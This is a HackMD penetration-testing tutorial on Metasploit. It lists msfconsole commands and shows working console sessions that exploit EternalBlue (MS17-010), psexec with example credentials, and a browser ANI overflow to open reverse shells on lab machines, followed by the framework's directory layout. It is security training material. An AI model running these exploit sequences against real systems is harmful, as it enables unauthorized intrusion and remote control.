Metasploit - HackMD

# Metasploit ###### tags: `pentest log` cite:`https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide` `https://searchsecurity.techtarget.com/tip/Using-Metasploit-for-real-world-security-tests` ## Need-to-know Metasploit commands(mostly is show, set, use) Below is an example of a Metasploit test using the free Metasploit Framework. I will be testing for WannaCry, a worm that exploited a vulnerability in the Microsoft Server Message Block protocol known as EternalBlue. Before jumping into the specific steps to execute this exploit, there are some common Metasploit console commands you should know about. The Metasploit console is referred to as msfconsole, which also happens to be the name of the batch file that starts up the program. Commands you should be familiar with include: - `help` (or '?' without the quotes) shows the available commands in msfconsole; - `info` shows a description of the specific exploit you're using along with its various options and requirements; - `show options` shows the various parameters for the specific exploit you're working with; - `show targets` shows the available target OSes and applications that can be exploited; - `show exploits` shows the exploits you can run -- in our example, the windows/smb/ms17_010_eternalblue exploit; - `show payloads` shows the various payload options you can execute on the exploited system such as spawn a command shell, uploading programs to run, etc. -- in our example, the shell_reverse_tcp exploit; - `use [exploit name] `instructs msfconsole to enter into a specific exploit's environment -- for example, use windows/smb/ms17_010_eternalblue will bring up the command prompt msf5 exploit(windows/smb/ms17_010_eternalblue) >; - `set PAYLOAD` allows you to set the specific payload for your exploit -- in our example, set PAYLOAD generic/shell_reverse_tcp; - `set TARGET` allows you to select a specific target OS or application when allowed by certain exploits; - `set RHOST` allows you to set your target(remote) host's IP address -- in this example, set RHOST 10.1.1.208; - `set LHOST` allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell -- in this example, set LHOST 10.1.1.214; - `back` allows you to exit the current exploit environment you've loaded and go back to the main msfconsole prompt; and - `exit` allows you to exit the Metasploit console. - `banner` Simply displays a randomly selected banner - `check` There aren’t many exploits that support it, but there is also a check option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it. - `connect` There is a miniature Netcat clone built into the msfconsole that supports SSL, proxies, pivoting, and file transfers. By issuing the connect command with an IP address and port number, you can connect to a remote host from within msfconsole the same as you would with Netcat or Telnet. - `edit` The edit command will edit the current module with $VISUAL or $EDITOR. By default, this will open the current module in Vim. - `grep` The grep command is similar to Linux grep. It matches a given pattern from the output of another msfconsole command. - `irb` Running the irb command will drop you into a live Ruby interpreter shell where you can issue commands and create Metasploit scripts on the fly. This feature is also very useful for understanding the internals of the Framework. - `jobs` Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs. - `kill` The kill command will kill any running jobs when supplied with the job id. - `load` The load command loads a plugin from Metasploit’s plugin directory. Arguments are passed as key=val on the shell. - `route` The route command in Metasploit allows you to route sockets through a session or ‘comm’, providing basic pivoting capabilities. To add a route, you pass the target subnet and network mask followed by the session (comm) number. - `search` The msfconsole includes an extensive regular-expression based search functionality. If you have a general idea of what you are looking for, you can search for it via search. In the output below, a search is being made for MS Bulletin MS09-011. The search function will locate this string within the module names, descriptions, references, etc. - `session` The sessions command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNC, etc. Another important command worth noting is msfupdate. Msfupdate is not a command that you run within the console, but an external program built into the Metasploit Framework. Msfupdate is a batch file located in the Metasploit Framework \bin folder that will download and update your running instance of Metasploit to the latest version. ## How to use Metasploit: Step by Step Now that I've described the basic commands, let's take a look at some specific steps required to carry out a real-world exploit. My testing system is a Windows 10 workstation running the latest Metasploit Framework. My test target in this example is a Windows 7 Professional workstation that has the MS17-010 SMB vulnerability that facilitates the EternalBlue and WannaCry ransomware exploit. I chose to demonstrate the exploitation of this vulnerability because it's still very common on nearly every internal network environment I test. It's also simple to exploit and has some pretty dire consequences. I know my target system has this vulnerability because I discovered it using the Nessus vulnerability scanner. There are plenty of other vulnerability scanners, such as Nexpose and QualysGuard, that can uncover this and similar vulnerabilities as well. This approach to finding and then exploiting vulnerabilities is the standard vulnerability and penetration testing methodology, but it's not required. You can blindly test your systems or, even better, Metasploit can do some of the legwork for you as certain exploits have detection checks to see if a system is vulnerable before exploiting it. For example, in the context of our sample exploit, there's a Metasploit module called MS17-010 SMB RCE Detection that can be launched inside the Metasploit console and can determine whether or not a system has been patched against this vulnerability. ### Step 1: Start Metasploit I load msfconsole.bat via the default installation folder of C:\metasploit-framework\bin and its command prompt comes up. Metasploit command prompt screenshot ![](https://i.imgur.com/u3mQdnW.png) Note: At this point you can enter show exploits to see which exploits are available to run. ### Step 2: Load an exploit to run I enter use windows/smb/ms17_010_eternalblue to run the specific exploit I know the system is vulnerable to, and it loads up that specific exploit's environment prompt (hence the windows/smb/ms17_010_eternalblue> prompt). Loading an exploit into Metasploit ![](https://i.imgur.com/0qFIXu6.png) ### Step 3: Show supported payloads I then enter show payloads to determine which payloads can be sent via this exploit. Showing payloads in Metasploit ![](https://i.imgur.com/Q2lz9ox.png) ### Step 4: Set the payload option I decide to keep things simple and have the exploit open up a reverse command shell, so I enter set PAYLOAD generic/shell_reverse_tcp. If you wish to use the meterpreter functionality built into Metasploit, you could use a similar payload of windows/meterpreter/reverse_tcp. For this exploit, all the Windows targets are the same -- Windows 7 and Server 2008 R2. Other exploits have different target options; you can set that value using the set TARGET command from above. Setting a Metasploit payload ![](https://i.imgur.com/YD5Xok3.png) ### Step 5: Show exploit options I then enter show options to determine the nonoptional exploit and payload parameters that don't have defaults and therefore must be set. Showing exploit options in Metasploit ![](https://i.imgur.com/KSs9UiV.png) ### Step 6: Set the required options I'll enter the RHOST and LHOST parameters via set RHOST 10.1.1.243 and set LHOST 10.1.1.215 and then enter show options one final time to make sure everything is set correctly. Setting required options in Metasploit ![](https://i.imgur.com/g2p2xNM.png) ### Step 7: Run the exploit Finally, I enter exploit to run the exploit and send the payload to my target system -- and voila -- the connection is established and I have a command prompt on the remote system. Vulnerability and penetration testing at its finest. Running a Metasploit exploit ![](https://i.imgur.com/L6efTjg.png) ### Summary - 3 essential element ```graphviz graph graphname { rankdir=LR; exploit -- target; payload -- exploit; target -- payload; } ``` ## Using Metasploit: There's more All exploits in the Metasploit Framework will fall into two categories: **active and passive**. ### Active Active exploits will exploit a specific host, run until completion, and then exit. - Brute-force modules will exit when a shell opens from the victim. - Module execution stops if an error is encountered. - You can force an active module to the background by passing ‘exploit -j’. Example: ```shell= msf > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 192.168.1.100 RHOST => 192.168.1.100 msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(psexec) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 msf exploit(psexec) > set LPORT 4444 LPORT => 4444 msf exploit(psexec) > set SMBUSER victim SMBUSER => victim msf exploit(psexec) > set SMBPASS s3cr3t SMBPASS => s3cr3t msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started reverse handler [*] Authenticating as user 'victim'... [*] Uploading payload... [*] Created \hikmEeEM.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \hikmEeEM.exe... [*] Sending stage (240 bytes) [*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> ``` ### Passive Passive exploits wait for incoming hosts and exploit them as they connect. - Passive exploits almost always focus on clients such as web browsers, FTP clients, etc. - They can also be used in conjunction with email exploits, waiting for connections. - Passive exploits report shells as they happen can be enumerated by passing ‘-l’ to the sessions command. Passing ‘-i’ will interact with a shell. Example: ```shell= msf > use exploit/windows/browser/ani_loadimage_chunksize msf exploit(ani_loadimage_chunksize) > set URIPATH / URIPATH => / msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 msf exploit(ani_loadimage_chunksize) > set LPORT 4444 LPORT => 4444 msf exploit(ani_loadimage_chunksize) > exploit [*] Exploit running as background job. [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.5:8080/ [*] Server started. msf exploit(ani_loadimage_chunksize) > [*] Attempting to exploit ani_loadimage_chunksize [*] Sending HTML page to 192.168.1.100:1077... [*] Attempting to exploit ani_loadimage_chunksize [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077... [*] Sending stage (240 bytes) [*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078) msf exploit(ani_loadimage_chunksize) > sessions -i 2 [*] Starting interaction with 2... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\victim\Desktop> ``` ## Metasploit Filesystem The MSF filesystem is laid out in an intuitive manner and is organized by directory. Some of the more important directories are briefly outlined below. ### data The data directory contains editable files used by Metasploit to store binaries required for certain exploits, wordlists, images, and more. ```shell= root@kali:~# ls /usr/share/metasploit-framework/data/ cpuinfo ipwn meterpreter snmp webcam eicar.com isight.bundle mime.yml sounds wmap eicar.txt john.conf msfcrawler SqlClrPayload wordlists emailer_config.yaml lab passivex templates exploits logos php vncdll.x64.dll flash_detector markdown_doc post vncdll.x86.dll ``` ### documentation As its name suggests, the documentation directory contains the available documentation for the framework. ```shell= root@kali:~# ls /usr/share/metasploit-framework/documentation/ changelog.Debian.gz CONTRIBUTING.md.gz developers_guide.pdf.gz README.md CODE_OF_CONDUCT.md copyright modules ``` ### lib The lib directory contains the ‘meat’ of the framework code base. ```shell= root@kali:~# ls /usr/share/metasploit-framework/lib/ anemone msfenv.rb rbmysql.rb sqlmap anemone.rb net rex tasks enumerable.rb postgres rex.rb telephony metasm postgres_msf.rb robots.rb telephony.rb metasploit rabal snmp windows_console_color_support.rb msf rbmysql snmp.rb ``` ### modules The modules directory is where you will find the actual MSF modules for **exploits**, **auxiliary** and post modules, **payloads**, encoders, and nop generators. ```shell= root@kali:~# ls /usr/share/metasploit-framework/modules/ auxiliary encoders exploits nops payloads post ``` Almost all of your interaction with Metasploit will be through its many modules, which it looks for in two locations. The first is the primary module store under ```/usr/share/metasploit-framework/modules/``` and the second, which is where you will store custom modules, is under your home directory at ```~/.msf4/modules/```. #### Exploits In the Metasploit Framework, exploit modules are defined as modules that use payloads. ```shell= root@kali:~# ls /usr/share/metasploit-framework/modules/exploits/ aix bsdi firefox irix multi solaris android dialup freebsd linux netware unix apple_ios example.rb hpux mainframe osx windows ``` #### Auxiliary Auxiliary modules include port scanners, fuzzers, sniffers, and more. ```shell= root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/ admin client dos gather scanner spoof vsploit analyze crawler example.rb parser server sqli bnat docx fuzzers pdf sniffer voip ``` #### Payloads, Encoders, Nops Payloads consist of code that runs remotely, while encoders ensure that payloads make it to their destination intact. Nops keep the payload sizes consistent across exploit attempts. ```shell= root@kali:~# ls /usr/share/metasploit-framework/modules/payloads/ singles stagers stages root@kali:~# ls /usr/share/metasploit-framework/modules/encoders/ cmd generic mipsbe mipsle php ppc ruby sparc x64 x86 root@kali:~# ls /usr/share/metasploit-framework/modules/nops/ aarch64 armle mipsbe php ppc sparc tty x64 x86 ``` #### Loading Additional Module Trees Metasploit gives you the option to load modules either at runtime or after msfconsole has already been started. Pass the -m option when running msfconsole to load additional modules at runtime: ```shell= root@kali:~# msfconsole -m ~/secret-modules/ ``` If you need to load additional modules from with msfconsole, use the loadpath command: ```shell= msf > loadpath Usage: loadpath </path/to/modules> Loads modules from the given directory which should contain subdirectories for module types, e.g. /path/to/modules/exploits msf > loadpath /usr/share/metasploit-framework/modules/ Loaded 399 modules: 399 payloads ``` ### plugins As you will see later in this course, Metasploit includes many plugins, which you will find in this directory. ```shell= root@kali:~# ls /usr/share/metasploit-framework/plugins/ aggregator.rb ips_filter.rb openvas.rb sounds.rb alias.rb komand.rb pcap_log.rb sqlmap.rb auto_add_route.rb lab.rb request.rb thread.rb beholder.rb libnotify.rb rssfeed.rb token_adduser.rb db_credcollect.rb msfd.rb sample.rb token_hunter.rb db_tracker.rb msgrpc.rb session_notifier.rb wiki.rb event_tester.rb nessus.rb session_tagger.rb wmap.rb ffautoregen.rb nexpose.rb socket_logger.rb ``` ### scripts The scripts directory contains Meterpreter and other scripts. ```shell= root@kali:~# ls /usr/share/metasploit-framework/scripts/ meterpreter ps resource shell ``` ### tools The tools directory has various useful command-line utilities. ```shell= root@kali:~# ls /usr/share/metasploit-framework/tools/ context dev exploit hardware memdump modules password recon ``` ### Metasploit Libraries There are a number of MSF libraries that allow us to run our exploits without having to write additional code for rudimentary tasks, such as HTTP requests or encoding of payloads. Some of the most important libraries are outlined below. ## MSF architecture ![](https://i.imgur.com/5fwZfdh.png) In the Metasploit Framework, all modules are `Ruby` classes. - Modules inherit from the type-specific class - The type-specific class inherits from the Msf::Module class - There is a shared common API between modules Payloads are slightly different. - Payloads are created at runtime from various components - Glue together stagers with stages